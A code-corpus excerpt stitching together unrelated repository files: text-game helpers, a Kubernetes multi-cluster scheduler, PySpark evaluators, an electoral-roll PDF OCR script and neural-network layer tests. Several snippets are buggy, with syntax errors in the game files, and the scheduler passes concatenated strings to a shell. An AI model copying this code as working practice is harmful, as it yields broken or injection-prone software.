win.addstr( y+8, x+2+TABLE_COL_ONE, strng )
if __name__ == '__main__':
curses.wrapper(_display, game_temp)
```
#### File: willows/display/dd_narrator.py
```python
def read( script, flag ):
"""
For a script dilineated into sections headed by flags starting with "## ",
finds the section with the passed-in flag and returns it.
Ignores lines starting with single #s. See /script/example .
"""
for line in script:
if line[0:2] == "## " and line[3:] == flag:
text = []
toRead = line + 1
while not script[toRead][0:2] == "## ":
#ignore comments
if script[ toRead ][0] == "#":
toRead += 1
#strip out blank lines at end of passages
#(I like having those lines in cause it makes scripts pretty.)
elif script[ toRead ] == "" and script[ toRead + 1 ][0:2] == "## "
toRead += 1
#add true lines to output
else:
text.append( script[ toRead ] )
toRead += 1
return text
def genFlagList( dance ):
"""
Accepts a dance object and returns a list of flags.
This is akin to reading or parsing the condition of the dance game.
The flags can then be read using read().
"""
flagList = []
#parse distance
distance = dance["game"]["d"]
if distance = 0:
flagList.append( "grapple" )
elif abs(distance) = 1:
flagList.append( "shortRange" )
elif abs(distance) = 2:
flagList.append( "midRange" )
elif abs(distance) = 3:
flagList.append( "longRange")
elif abs(distance) >= 4:
flaglist.append( "far" )
def narrate( dance, script ):
"""
This accepts a dance, gets all relevant flags, and returns their corresponding scripts.
In your games, you may wish to narrate flags in a certain order,
so this may be too blunt for you.
"""
# in fact this might be too blunt for everyone...
# how do I make it more versatile?
narrative = []
flagList = genFlagList( dance )
for flag in flagList:
narrative += read( script, flag )
return narrative
```
#### File: willows/tools/choose.py
```python
import sys # for sys. exit
def choose( *args ):
"""
Accepts a list of options,
then traps the player
until it types one of them.
"""
# First prepare to print the list of options.
string = "["
# args.append( "quit" )
for choice in enumerate(args):
string += choice[1]
if choice[0] != len(args) - 1:
string += "/"
string += "] "
# Then get the choice.
valid = 0
while valid == 0:
player_choice = raw_input( string )
if player_choice in args:
valid = 1
else:
print( "Invalid response." )
if player_choice == "quit":
sys.exit()
return player_choice
```
#### File: willows/tools/die.py
```python
import random
import math
def d( sides ):
result = math.floor( random.random() * sides )
return result
def die_test( sides, tries ):
array = range( 0, sides)
total = 0
for iterations in range( 0, tries ):
roll = int( d( sides ) )
array( roll ) += 1
total += roll
print( total )
print( array )
"""
LlL
"""
``` |
{
"source": "00ahui/mck8s",
"score": 2
} |
#### File: mck8s/multi-cluster-scheduler/utils.py
```python
from kubernetes import client, config
from kubernetes.client.rest import ApiException
from collections import defaultdict
from pint import UnitRegistry
from prometheus_api_client import PrometheusConnect
import subprocess
import operator
import os
import math
import pandas as pd
# Load k8s contexts
config.load_kube_config()
timeout = 30
ureg = UnitRegistry()
Q_ = ureg.Quantity
# Memory units
ureg.define('kmemunits = 1 = [kmemunits]')
ureg.define('Ki = 1024 * kmemunits')
ureg.define('Mi = Ki^2')
ureg.define('Gi = Ki^3')
ureg.define('Ti = Ki^4')
ureg.define('Pi = Ki^5')
ureg.define('Ei = Ki^6')
# cpu units
ureg.define('kcpuunits = 1 = [kcpuunits]')
ureg.define('m = 1/1000 * kcpuunits')
ureg.define('k = 1000 * kcpuunits')
ureg.define('M = k^2')
ureg.define('G = k^3')
ureg.define('T = k^4')
ureg.define('P = k^5')
ureg.define('E = k^6')
def findPossibleReplacementClusters(cluster, original_clusters, app_cpu_request, app_memory_request):
nearest_clusters = findNearestClusters(cluster, original_clusters)
possible_clusters = []
for c in nearest_clusters:
check_possibility = checkClusterPossibility(c, app_cpu_request, app_memory_request)
if check_possibility == True:
possible_clusters.append(c)
return possible_clusters
def findEligibleReplacementClusters(cluster, original_clusters, app_cpu_request, app_memory_request, replicas):
print("Looking for clusters near to " + cluster)
nearest_clusters = findNearestClusters(cluster, original_clusters)
print("Nearest clusters ....", nearest_clusters)
eligible_clusters = []
for c in nearest_clusters:
check_eligibility = checkClusterEligibility(c, app_cpu_request, app_memory_request, replicas)
if check_eligibility == True:
eligible_clusters.append(c)
return eligible_clusters
def findPossibleClusters(clusters, app_cpu_request, app_memory_request):
print("==================== Processing possible clusters ==========================")
print(clusters)
possible_clusters_list = []
for cluster in clusters:
is_possible = checkClusterPossibility(cluster, app_cpu_request, app_memory_request)
if is_possible == True:
possible_clusters_list.append(cluster)
else:
possible_replacements = findPossibleReplacementClusters(cluster, clusters, app_cpu_request, app_memory_request)
print("Replacement clusters ...............", possible_replacements)
if len(possible_replacements) > 0:
possible_clusters_list.append(possible_replacements[0])
return possible_clusters_list
def findEligibleClusters(fogapp_locations, possible_clusters, override_replicas_new, fogapp_cpu_request, fogapp_memory_request):
eligible_clusters = []
for cluster in possible_clusters:
replicas = int(override_replicas_new[cluster])
# is_eligible = checkClusterEligibility(cluster, app_cpu_request, app_memory_request, replicas)
# The maximum number of replicas the cluster can host
maximum_replicas = getMaximumReplicas(cluster, fogapp_cpu_request, fogapp_memory_request)
if maximum_replicas > replicas:
dict = {}
dict['name'] = cluster
dict['max_replicas'] = maximum_replicas
dict['replicas'] = replicas
dict['overflow'] = 0
eligible_clusters.append(dict)
else:
dict = {}
dict['name'] = cluster
dict['max_replicas'] = maximum_replicas
dict['replicas'] = maximum_replicas
dict['overflow'] = replicas - maximum_replicas
eligible_clusters.append(dict)
temp_list = []
for cluster in eligible_clusters:
temp_list.append(cluster)
print("Possible list of clusters and oveflow ....", temp_list)
temp_list_2 = []
for cluster in temp_list:
temp_list_2.append(cluster['name'])
temp_list_3 = list(set(fogapp_locations + temp_list_2))
total_overflow = 0
for cluster in temp_list:
total_overflow += cluster['overflow']
maximum_replicas = {}
for cluster in temp_list:
nearest_clusters = []
overflow = cluster['overflow']
# leftover = overflow
print("Overflow from ", cluster, overflow)
if overflow > 0:
nearest_clusters = findNearestClusters(cluster, temp_list_3)
print("List of nearest clusters ....", nearest_clusters)
# else:
# print("The cluster doesn't have overflow ....")
# break
# Distribute overflow to nearest clusters
if len(nearest_clusters) > 0:
for c in nearest_clusters:
# print("Overflow .................", overflow)
# if overflow > 0:
maximum_replicas[c] = getMaximumReplicas(c, fogapp_cpu_request, fogapp_memory_request)
print("Maximum replicas .....", maximum_replicas)
for cluster in temp_list:
nearest_clusters = []
overflow = cluster['overflow']
if overflow > 0:
nearest_clusters = findNearestClusters(cluster, temp_list_3)
# else:
# break
if len(nearest_clusters) > 0:
for c in nearest_clusters:
if cluster['overflow'] > 0:
if maximum_replicas[c] == 0:
cluster['overflow'] = cluster['overflow']
# break
elif maximum_replicas[c] > cluster['overflow']:
dict = {}
dict['name'] = c
dict['replicas'] = cluster['overflow']
dict['overflow'] = 0
eligible_clusters.append(dict)
maximum_replicas[c] = maximum_replicas[c] - cluster['overflow']
cluster['overflow'] = 0
# break
else:
dict = {}
dict['name'] = c
dict['replicas'] = maximum_replicas[c]
dict['overflow'] = 0
cluster['overflow'] = cluster['overflow'] - maximum_replicas[c]
eligible_clusters.append(dict)
maximum_replicas[c] = 0
eligible_clusters = (pd.DataFrame(eligible_clusters)
.groupby(['name'], as_index=False)
.agg({'replicas': 'sum', 'overflow': 'sum'})
.to_dict('r'))
return eligible_clusters
def checkClusterEligibility(cluster, app_cpu_request, app_memory_request, replicas):
print("==================== Processing eligible clusters ==========================")
totalAvailableCPU, totalAvailableMemory, available_resources_per_node = compute_available_resources(cluster)
print("Available resources per node ..... for cluster", cluster, available_resources_per_node)
count = 0
for node in available_resources_per_node:
count += min(math.floor(node['cpu']/app_cpu_request), math.floor(node['memory']/app_memory_request))
print("Total number of replicas that can be scheduled ........... on", cluster, count)
#if count > replicas:
if count > replicas:
return True
else:
return False
def getAllocatableCapacity(cluster, app_cpu_request, app_memory_request, app_name, app_namespace):
print("Compute allocatable capacity ..............")
allocatable_capacity_per_node = computeAllocatableCapacity(cluster, app_name, app_namespace)
count = 0
for node in allocatable_capacity_per_node:
count += min(math.floor(node['cpu']/app_cpu_request), math.floor(node['memory']/app_memory_request))
return count
def getMaximumReplicas(cluster, app_cpu_request, app_memory_request):
print("Get the maximum number of replicas > 0 clusters can run ....")
totalAvailableCPU, totalAvailableMemory, available_resources_per_node = compute_available_resources(cluster)
count = 0
for node in available_resources_per_node:
count += min(math.floor(node['cpu']/app_cpu_request), math.floor(node['memory']/app_memory_request))
return count
def computeAllocatableCapacity(cluster, app_name, namespace):
total_allocatable_cpu = 0
total_allocatable_memory = 0
core_v1 = client.CoreV1Api(api_client=config.new_client_from_config(context=cluster))
allocatable_resources_per_node = []
try:
for node in core_v1.list_node(_request_timeout=timeout).items:
stats = {}
node_name = node.metadata.name
allocatable = node.status.allocatable
allocatabale_cpu = Q_(allocatable['cpu']).to('m')
allocatable_memory = Q_(allocatable['memory'])
total_allocatable_cpu += allocatabale_cpu
total_allocatable_memory += allocatable_memory
max_pods = int(int(allocatable["pods"]) * 1.5)
field_selector = ("status.phase!=Succeeded,status.phase!=Failed," +
"spec.nodeName=" + node_name)
# Calculate for all ns
node_cpu_request_all = 0
node_memory_request_all = 0
pods = core_v1.list_pod_for_all_namespaces(limit=max_pods,
field_selector=field_selector).items
cpureqs, memreqs = [], []
for pod in pods:
for container in pod.spec.containers:
res = container.resources
reqs = defaultdict(lambda: 0, res.requests or {})
cpureqs.append(Q_(reqs["cpu"]))
memreqs.append(Q_(reqs["memory"]))
node_cpu_request_all += sum(cpureqs)
node_memory_request_all += sum(memreqs)
# Calculate for the namespace
node_cpu_request_default = 0
node_memory_request_default = 0
# Get pods in the namespace
pods = core_v1.list_namespaced_pod(namespace=namespace, limit=max_pods,
field_selector=field_selector).items
cpureqs, memreqs = [], []
for pod in pods:
for container in pod.spec.containers:
res = container.resources
reqs = defaultdict(lambda: 0, res.requests or {})
cpureqs.append(Q_(reqs["cpu"]))
memreqs.append(Q_(reqs["memory"]))
node_cpu_request_default += sum(cpureqs)
node_memory_request_default += sum(memreqs)
# Exclude the resource request of other apps in the default namespace
# Calculate for the namespace other apps
node_cpu_request_default_other = 0
node_memory_request_default_other = 0
# Get pods of default ns
pods = core_v1.list_namespaced_pod(namespace=namespace, limit=max_pods,
field_selector=field_selector).items
cpureqs, memreqs = [], []
for pod in pods:
for container in pod.spec.containers:
if container.name != app_name:
res = container.resources
reqs = defaultdict(lambda: 0, res.requests or {})
cpureqs.append(Q_(reqs["cpu"]))
memreqs.append(Q_(reqs["memory"]))
node_cpu_request_default_other += sum(cpureqs)
node_memory_request_default_other += sum(memreqs)
dict = {}
dict['name'] = node_name
dict['cpu'] = float(allocatabale_cpu - node_cpu_request_all + node_cpu_request_default - node_cpu_request_default_other) * 1000
dict['memory'] = float(allocatable_memory - node_memory_request_all + node_memory_request_default - node_memory_request_default_other) / (
1024 * 1024)
allocatable_resources_per_node.append(dict)
except:
print("Connection timeout after " + str(timeout) + " seconds on cluster " + cluster)
return allocatable_resources_per_node
def compute_available_resources(cluster):
total_allocatable_cpu = 0
total_allocatable_memory = 0
available_cpu = 0
available_memory = 0
total_cpu_request = 0
total_memory_request = 0
core_v1 = client.CoreV1Api(api_client=config.new_client_from_config(context=cluster))
available_resources_per_node = []
try:
for node in core_v1.list_node(_request_timeout=timeout).items:
stats = {}
node_name = node.metadata.name
allocatable = node.status.allocatable
allocatabale_cpu = Q_(allocatable['cpu']).to('m')
allocatable_memory = Q_(allocatable['memory'])
total_allocatable_cpu += allocatabale_cpu
total_allocatable_memory += allocatable_memory
max_pods = int(int(allocatable["pods"]) * 1.5)
field_selector = ("status.phase!=Succeeded,status.phase!=Failed," +
"spec.nodeName=" + node_name)
node_cpu_request = 0
node_memory_request = 0
pods = core_v1.list_pod_for_all_namespaces(limit=max_pods,
field_selector=field_selector).items
cpureqs, memreqs = [], []
for pod in pods:
for container in pod.spec.containers:
res = container.resources
reqs = defaultdict(lambda: 0, res.requests or {})
cpureqs.append(Q_(reqs["cpu"]))
memreqs.append(Q_(reqs["memory"]))
node_cpu_request += sum(cpureqs)
node_memory_request += sum(memreqs)
dict = {}
dict['name'] = node_name
dict['cpu'] = float(allocatabale_cpu - node_cpu_request) * 1000
dict['memory'] = float(allocatable_memory - node_memory_request) / (1024 * 1024)
available_resources_per_node.append(dict)
total_cpu_request += Q_(node_cpu_request)
total_memory_request += Q_(node_memory_request).to('Ki')
available_cpu = total_allocatable_cpu - total_cpu_request
available_memory = total_allocatable_memory - total_memory_request
available_cpu = float(str(available_cpu)[:-2])
available_memory = float(str(available_memory)[:-3])
except:
print("Connection timeout after " + str(timeout) + " seconds on cluster " + cluster)
return available_cpu, available_memory, available_resources_per_node
def getPerNodeResources(cluster):
perNodeCPU = 0
perNodeMemory = 0
client_cluster = client.CoreV1Api(api_client=config.new_client_from_config(context=cluster))
try:
nodes = client_cluster.list_node(_request_timeout=timeout)
perNodeCPU = Q_(nodes.items[0].status.capacity['cpu']).to('m')
perNodeMemory = Q_(nodes.items[0].status.capacity['memory']).to('Ki')
perNodeCPU = float(str(perNodeCPU)[:-2])
perNodeMemory = float(str(perNodeMemory)[:-3])
except:
print("Connection timeout after " + str(timeout) + " seconds to " + cluster)
return perNodeCPU, perNodeMemory
def checkClusterPossibility(cluster, app_cpu_request, app_memory_request):
cluster_per_node_cpu, cluster_per_node_memory = getPerNodeResources(cluster)
if app_cpu_request >= cluster_per_node_cpu or app_memory_request*1024 >= cluster_per_node_memory:
return False
else:
return True
def get_all_federation_clusters():
config.load_kube_config()
api_instance = client.CustomObjectsApi()
group = 'core.kubefed.io' # str | The custom resource's group name
version = 'v1beta1' # str | The custom resource's version
namespace = 'kube-federation-system' # str | The custom resource's namespace
plural = 'kubefedclusters' # str | The custom resource's plural name. For TPRs this would be lowercase plural kind.
pretty = 'true'
clusters = []
try:
api_response = api_instance.list_namespaced_custom_object(group, version, namespace, plural, pretty=pretty, _request_timeout=timeout)
for item in api_response['items']:
clusters.append(item['metadata']['name'])
except:
print("Connection timeout after " + str(timeout) + " seconds to host cluster")
return clusters
def findNearestClusters(input_cluster, original_clusters):
if isinstance(input_cluster, dict):
input_cluster = input_cluster['name']
# TO DO: Specify cluster 0
config.load_kube_config()
api = client.CoreV1Api()
sorted_list = []
try:
nodes = api.list_node(pretty=True, _request_timeout=timeout)
nodes = [node for node in nodes.items if
'node-role.kubernetes.io/master' in node.metadata.labels]
# get all addresses of the master
addresses = nodes[0].status.addresses
master_ip = [i.address for i in addresses if i.type == "InternalIP"][0]
all_clusters = get_all_federation_clusters()
# Don't consider cloud cluster for latency comparison
# TO DO: Install and configure serf on cloud cluster
fog_only_clusters = []
for cluster in all_clusters:
if 'cloud' not in cluster:
fog_only_clusters.append(cluster)
candidate_clusters = list(filter(lambda x: x not in original_clusters, fog_only_clusters))
rtt_dict = {}
#sorted_list = []
for c in candidate_clusters:
command = 'serf rtt -rpc-addr=' + master_ip + ':7474 ' + c + ' ' + input_cluster
result = subprocess.getoutput(command)
# Need exception handling for the case when serf is not installed or available
if 'Error' in result:
print("There is error connecting to serf .........................................")
result = float(result.split()[-2])
rtt_dict[c] = result
s = sorted(rtt_dict.items(), key=lambda x: x[1], reverse=False)
for k, v in s:
sorted_list.append(k)
print("Sorted list of clusters ....", sorted_list)
except:
print("Connection timeout after " + str(timeout) + " seconds to host cluster")
return sorted_list
def getFogAppLocationsByResource(clusters_qty):
available_cpu = {}
available_memory = {}
all_clusters = get_all_federation_clusters()
for cluster in all_clusters:
available_cpu[cluster], available_memory[cluster] = compute_available_resources(cluster)
sorted_dict = dict(sorted(available_memory.items(),
key=operator.itemgetter(1),
reverse=True))
if clusters_qty > len(all_clusters):
clusters_qty = len(all_clusters)
fogapp_locations = []
for key in sorted_dict:
fogapp_locations.append(key)
fogapp_locations = fogapp_locations[:clusters_qty]
return fogapp_locations
def getControllerMasterIP():
# TO DO: Specify cluster 0
config.load_kube_config()
#api = client.CoreV1Api(api_client=config.new_client_from_config(context="cluster0"))
api = client.CoreV1Api()
master_ip = ""
try:
nodes = api.list_node(pretty=True, _request_timeout=timeout)
nodes = [node for node in nodes.items if
'node-role.kubernetes.io/master' in node.metadata.labels]
# get all addresses of the master
addresses = nodes[0].status.addresses
master_ip = [i.address for i in addresses if i.type == "InternalIP"][0]
except:
print("Connection timeout after " + str(timeout) + " seconds to host cluster")
return master_ip
def getFogAppLocations(app_name, app_namespace, app_cpu_request, app_memory_request, replicas, clusters_qty, placement_policy, mode):
master_ip = getControllerMasterIP()
prom_host = os.getenv("PROMETHEUS_DEMO_SERVICE_SERVICE_HOST", master_ip)
prom_port = os.getenv("PROMETHEUS_DEMO_SERVICE_SERVICE_PORT", "30090")
prom_url = "http://" + prom_host + ":" + prom_port
# Creating the prometheus connect object with the required parameters
pc = PrometheusConnect(url=prom_url, disable_ssl=True)
# TO DO get all federation clusters except cloud
all_clusters = get_all_federation_clusters()
print("List of all clusters ................", all_clusters)
fog_only_clusters = []
for cluster in all_clusters:
if 'cloud' not in cluster:
fog_only_clusters.append(cluster)
print("Fog - only clusters .....", fog_only_clusters)
cluster_network_receive = {}
possible_clusters = []
for cluster in fog_only_clusters:
if checkClusterPossibility(cluster, app_cpu_request, app_memory_request) == True:
possible_clusters.append(cluster)
print("List of possible clusters ..............", possible_clusters)
eligible_clusters = []
if len(possible_clusters) == 0:
eligible_clusters = []
else:
for cluster in possible_clusters:
# if checkClusterEligibility(cluster, app_cpu_request, app_memory_request, replicas) == True:
# eligible_clusters.append(cluster)
# Get eligible clusters and their maximum capacity
if mode == 'create':
maximum_replicas = getMaximumReplicas(cluster, app_cpu_request, app_memory_request)
elif mode == 'update':
maximum_replicas = getAllocatableCapacity(cluster, app_cpu_request, app_memory_request, app_name, app_namespace)
if maximum_replicas > 0:
dict = {}
dict['name'] = cluster
dict['max_replicas'] = maximum_replicas
eligible_clusters.append(dict)
print("List of Eligible clusters ..............", eligible_clusters)
if len(eligible_clusters) == 0:
fogapp_locations = []
all_clusters = get_all_federation_clusters()
for cluster in all_clusters:
if 'cloud' in cluster:
dict = {}
dict['name'] = cluster
dict['max_replicas'] = replicas * clusters_qty
fogapp_locations.append(dict)
return fogapp_locations
else:
sorted_eligible_clusters = []
if placement_policy == 'most_traffic' or placement_policy == 'most-traffic':
for cluster in eligible_clusters:
if mode == 'create':
query = "sum(instance:node_network_receive_bytes_excluding_lo:rate1m{cluster_name='" + cluster['name'] + "'})"
elif mode == 'update':
query = "sum(irate(container_network_receive_bytes_total{cluster_name='" + cluster['name'] + "', namespace='" + app_namespace + "', pod=~'frontend.*'}[60s]))"
# Here, we are fetching the values of a particular metric name
result = pc.custom_query(query=query)
#cluster_network_receive[cluster['name']] = float(result[0]['value'][1])
if len(result) > 0:
cluster['ntk_rcv'] = float(result[0]['value'][1])
else:
cluster['ntk_rcv'] = 0.0
# sorted_dict = dict(sorted(cluster_network_receive.items(),
# key=operator.itemgetter(1),
# reverse=True))
sorted_eligible_clusters = sorted(eligible_clusters, key = lambda i: i['ntk_rcv'], reverse=True)
elif placement_policy == 'worst_fit' or placement_policy == 'worst-fit':
sorted_eligible_clusters = sorted(eligible_clusters, key=lambda i: i['max_replicas'], reverse=True)
elif placement_policy == 'best_fit' or placement_policy == 'best-fit':
sorted_eligible_clusters = sorted(eligible_clusters, key=lambda i: i['max_replicas'])
print("List of sorted traffic and policy ....", sorted_eligible_clusters)
fogapp_locations = []
for cluster in sorted_eligible_clusters:
dict = {}
dict['name'] = cluster['name']
dict['max_replicas'] = cluster['max_replicas']
fogapp_locations.append(dict)
# for key in sorted_dict:
# fogapp_locations.append(key)
all_clusters = get_all_federation_clusters()
# if 'cloud' in all_clusters:
# fogapp_locations.append('cloud')
for cluster in all_clusters:
if 'cloud' in cluster:
dict = {}
dict['name'] = cluster
dict['max_replicas'] = replicas
fogapp_locations.append(dict)
print("Final list of clusters which will host the app in the Default case ....", fogapp_locations)
#fogapp_locations = fogapp_locations[:clusters_qty]
return fogapp_locations
def getFogAppClusters(name, namespace):
config.load_kube_config()
api = client.CustomObjectsApi()
group = 'fogguru.eu'
version = 'v1'
namespace = namespace
plural = 'multiclusterdeployments'
current_clusters = []
original_clusters = []
api_response = api.list_namespaced_custom_object(group=group, version=version, namespace=namespace, plural=plural)
for item in api_response['items']:
if item['metadata']['name'] == name:
original_clusters = item['status']['create_fn']['fogapp_locations']
if 'update_fn' in item['status']:
current_clusters = item['status']['update_fn']['fogapp_locations']
else:
current_clusters = item['status']['create_fn']['fogapp_locations']
return current_clusters, original_clusters
def getServiceClusters(name, namespace):
config.load_kube_config()
api = client.CustomObjectsApi()
group = 'fogguru.eu'
version = 'v1'
namespace = namespace
plural = 'multiclusterservices'
current_clusters = []
original_clusters = []
api_response = api.list_namespaced_custom_object(group=group, version=version, namespace=namespace, plural=plural)
for item in api_response['items']:
if item['metadata']['name'] == name:
if item['status'] != "":
if 'create_fn' in item['status']:
original_clusters = item['status']['create_fn']['fogapp_locations']
if 'update_fn' in item['status']:
current_clusters = item['status']['update_fn']['fogapp_locations']
elif 'create_fn' in item['status']:
current_clusters = item['status']['create_fn']['fogapp_locations']
return current_clusters, original_clusters
def getCloudCluster():
all_clusters = get_all_federation_clusters()
cloud_cluster = ''
for cluster in all_clusters:
if 'cloud' in cluster:
cloud_cluster = cluster
return cloud_cluster
def createDeployment(cluster, deployment_body, namespace):
core_v1 = client.AppsV1Api(api_client=config.new_client_from_config(context=cluster))
try:
core_v1.create_namespaced_deployment(namespace=namespace, body=deployment_body, _request_timeout=timeout)
except:
print("Connection timeout after " + str(timeout) + " seconds when creating Deployment on " + cluster )
def createService(cluster, service_body, namespace):
core_v1 = client.CoreV1Api(api_client=config.new_client_from_config(context=cluster))
try:
core_v1.create_namespaced_service(namespace=namespace, body=service_body, _request_timeout=timeout)
except:
print("Connection timeout after " + str(timeout) + " seconds when creating Service on " + cluster)
def deleteDeployment(cluster, deployment_name, namespace):
core_v1 = client.AppsV1Api(api_client=config.new_client_from_config(context=cluster))
try:
core_v1.delete_namespaced_deployment(namespace=namespace, name=deployment_name, _request_timeout=timeout)
except:
print("Connection timeout after " + str(timeout) + " seconds when deleting Deployment from " + cluster)
def deleteService(cluster, service_name, namespace):
core_v1 = client.CoreV1Api(api_client=config.new_client_from_config(context=cluster))
try:
core_v1.delete_namespaced_service(namespace=namespace, name=service_name, _request_timeout=timeout)
except:
print("Connection timeout after " + str(timeout) + " seconds when deleting Service from " + cluster)
def patchDeployment(cluster, deployment_name, deployment_body, namespace):
core_v1 = client.AppsV1Api(api_client=config.new_client_from_config(context=cluster))
try:
core_v1.patch_namespaced_deployment(namespace=namespace, name=deployment_name, body=deployment_body, _request_timeout=timeout)
except:
print("Connection timeout after " + str(timeout) + " seconds when patching Deployment on " + cluster)
def patchService(cluster, service_name, service_body, namespace):
core_v1 = client.CoreV1Api(api_client=config.new_client_from_config(context=cluster))
try:
core_v1.patch_namespaced_service(namespace=namespace, name=service_name, body=service_body, _request_timeout=timeout)
except:
print("Connection timeout after " + str(timeout) + " seconds when patching Service on " + cluster)
def createJob(cluster, job_body, namespace):
core_v1 = client.BatchV1Api(api_client=config.new_client_from_config(context=cluster))
try:
core_v1.create_namespaced_job(namespace=namespace, body=job_body, _request_timeout=timeout)
except:
print("Connection timeout after " + str(timeout) + " seconds when creating Job on " + cluster)
def patchJob(cluster, fogapp_name, job_body, namespace):
core_v1 = client.BatchV1Api(api_client=config.new_client_from_config(context=cluster))
try:
core_v1.patch_namespaced_job(namespace=namespace, name=fogapp_name, body=job_body, _request_timeout=timeout)
except:
print("Connection timeout after " + str(timeout) + " seconds when patching Job on " + cluster)
def deleteJob(cluster, fogapp_name, namespace):
core_v1 = client.BatchV1Api(api_client=config.new_client_from_config(context=cluster))
try:
core_v1.delete_namespaced_job(namespace=namespace, name=fogapp_name, _request_timeout=timeout)
except:
print("Connection timeout after " + str(timeout) + " seconds when deleting Job from " + cluster)
``` |
{
"source": "00anupam00/comparative-analysis",
"score": 3
} |
#### File: src/binary/PrePocessor.py
```python
from pyspark.sql import dataframe
from src.utils.Utils import generate_id
def attach_labels(df_data_id, df_labels):
# JOIN
df = df_data_id.join(df_labels, on=["id"], how="inner")
return df
def pre_process_data(df_data: dataframe, df_labels: dataframe):
df_data_id = generate_id(df_data)
df = attach_labels(df_data_id, df_labels)
return df
```
#### File: src/multiclass/Evaluators.py
```python
from pyspark.ml.evaluation import MulticlassClassificationEvaluator
from pyspark.sql import dataframe
def evaluate_multiclass(df: dataframe.DataFrame):
# Select (prediction, true label) and compute test error
evaluator = MulticlassClassificationEvaluator(labelCol="label", predictionCol="prediction")
accuracy = evaluator.evaluate(df, {evaluator.metricName: "accuracy"})
weightedPrecision = evaluator.evaluate(df, {evaluator.metricName: "weightedPrecision"})
weightedFMeasure = evaluator.evaluate(df, {evaluator.metricName: "weightedFMeasure"})
# fMeasureByLabel = evaluator.evaluate(df, {evaluator.metricName: "fMeasureByLabel"})
weightedRecall = evaluator.evaluate(df, {evaluator.metricName: "weightedRecall"})
weightedFalsePositiveRate = evaluator.evaluate(df, {evaluator.metricName: "weightedFalsePositiveRate"})
weightedTruePositiveRate = evaluator.evaluate(df, {evaluator.metricName: "weightedTruePositiveRate"})
print("Test Error = %g \nAccuracy: %s \nFPR: %s\nTPR: %s\nF-measure: %s\nPrecision: %s\nRecall: %s"
% ((1.0 - accuracy), accuracy*100, weightedFalsePositiveRate, weightedTruePositiveRate, weightedFMeasure, weightedPrecision, weightedRecall))
```
#### File: src/multiclass/MulticlassDataLoader.py
```python
from pyspark.sql.functions import regexp_replace, when, lit
from pyspark.sql.types import StructType, StructField, LongType, IntegerType, StringType
from src.SparkConfig import get_spark_session
from src.binary.PrePocessor import pre_process_data
spark = get_spark_session("comparative-analysis")
def load_data(data_path, labels_path, multiclass_param):
df_data = spark.read.load(
data_path,
format="csv", sep=",", inferSchema="true", header="false")
print("Loaded dataset. ")
labels_schema = StructType([StructField("id", LongType(), False),
StructField("label", IntegerType(), False)])
df_labels = spark.read.load(
labels_path,
format="csv",
sep=",",
inferSchema="false",
schema=labels_schema,
mode="DROPMALFORMED",
header="true")
df_labels = df_labels.withColumn('label', when(df_labels.label == 1, lit(multiclass_param)).otherwise(lit(0)))
print("Loaded labels. ")
df_labels.select("id", "label").orderBy('id', ascending=False).show()
# Pass through data pre-processor
df = pre_process_data(df_data, df_labels)
return df
def show(df):
df.describe().show(25)
print("The last 10 lines of the dataset: ")
print(df.tail(10))
```
#### File: comparative-analysis/src/SparkConfig.py
```python
from pyspark.sql import SparkSession
def get_spark_session(appName):
return SparkSession.builder.appName(appName).getOrCreate()
``` |
{
"source": "00archer0/Dataminig",
"score": 3
} |
#### File: 00archer0/Dataminig/mix.py
```python
import pandas as pd
import re
import urllib
import requests
from urllib.request import urlretrieve
from wand.image import Image
import io
import os
import six
from google.cloud import vision
from google.cloud import translate
from google.cloud.vision import types
import json
client = vision.ImageAnnotatorClient()
target = 'en'
final = ''
counter = []
station = pd.read_excel('polling_station.xlsx')
link = 'http://ceoharyana.nic.in/docs/election/finalroll2018/'
link_part = 'CMB02/CMB0020022.PDF'
url = link+link_part
item = [(3400,300,3800,500),(450,1970,2480,3850),(870,4070,2700,4300),(870,4330,2700,4500),
(3100,2900,3800,3050),(3120,3780,3800,3860),(1300,4980,2000,5250)]
def get_pic(sample_pdf,area):
img = sample_pdf.clone()
img.crop(*area)
return img.make_blob('JPEG')
for x in range(1,21):
num = re.findall(r'\d+',station.AC[x])
first_part = 'CMB' + num[0]
print('here')
final = ''
for p in range(1,station['polling_station'][x])+1:
print(str(p) +' next here')
sec_part = 'CMB'+ str(num[0]).zfill(3) + str(p).zfill(4)
path = first_part + '_' + sec_part +'.pdf'
url = link + first_part + '/' + sec_part +'.PDF'
fetched_item = ''
sample_pdf = Image(filename=path+"[0]", resolution=500)
for t in item:
print(t)
content = get_pic(sample_pdf,t)
image = types.Image(content= content)
image_context = vision.types.ImageContext(language_hints=['hi'])
response = client.document_text_detection(image=image)
texts = response.text_annotations
texts = texts[0].description.replace('\n',' ')
fetched_item = fetched_item+texts+' ~ '
print(fetched_item)
final = final+fetched_item+'\n'
'''final.append(str(fetched_item))
print(final)
to_save = pd.DataFrame(final)
to_save.to_csv('fin.csv',index=False,encoding='utf-8',header=False)
'''
with open(station['AC'][x]+'.txt','w+',encoding='utf-8') as file:
file.write(final)
print(counter.count(1))
print('here')
``` |
{
"source": "00arun00/SimFlow",
"score": 4
} |
#### File: simflow/utils/grad_check_utils.py
```python
import numpy as np
def numerical_gradient_array(f, x, df, h=1e-5):
"""
Evaluate a numeric gradient for a function that accepts a numpy
array and returns a numpy array.
Args:
f (function): function that is passed to compute gradient for
x (numpy.ndarray): input to function
df (numpy.ndarray): output gradient
h (float): delta around which gradient is calculated
Returns:
grad (numpy.ndarray): computed numeric gradient
"""
grad = np.zeros_like(x)
it = np.nditer(x, flags=['multi_index'], op_flags=['readwrite'])
while not it.finished:
ix = it.multi_index
oldval = x[ix]
x[ix] = oldval + h
pos = f(x).copy()
x[ix] = oldval - h
neg = f(x).copy()
x[ix] = oldval
grad[ix] = np.sum((pos - neg) * df) / (2 * h)
it.iternext()
return grad
```
#### File: SimFlow/tests/test_conv.py
```python
import numpy as np
from simflow.layers.convolutional import Conv2D
from simflow.utils.grad_check_utils import numerical_gradient_array
from simflow.utils.im2col import im2col_indices
from unittest import TestCase
class TestConv(TestCase):
@staticmethod
def standard_forward(X, w, b, padding, stride):
n_x, d_x, h_x, w_x = X.shape
n_filters, d_filter, h_filter, w_filter = w.shape
h_out = (h_x - h_filter + 2 * padding) // stride + 1
w_out = (w_x - w_filter + 2 * padding) // stride + 1
X_col = im2col_indices(X, h_filter, w_filter,
padding=padding, stride=stride)
W_col = w.reshape(n_filters, -1)
out = W_col @ X_col + b
out = out.reshape(n_filters, h_out, w_out, n_x)
out = out.transpose(3, 0, 1, 2)
return out
def test_conv_layer_forward_prop(self):
eps = 1e-8
batch_size = 32
filter_size = 3
h_x, w_x = 7, 7
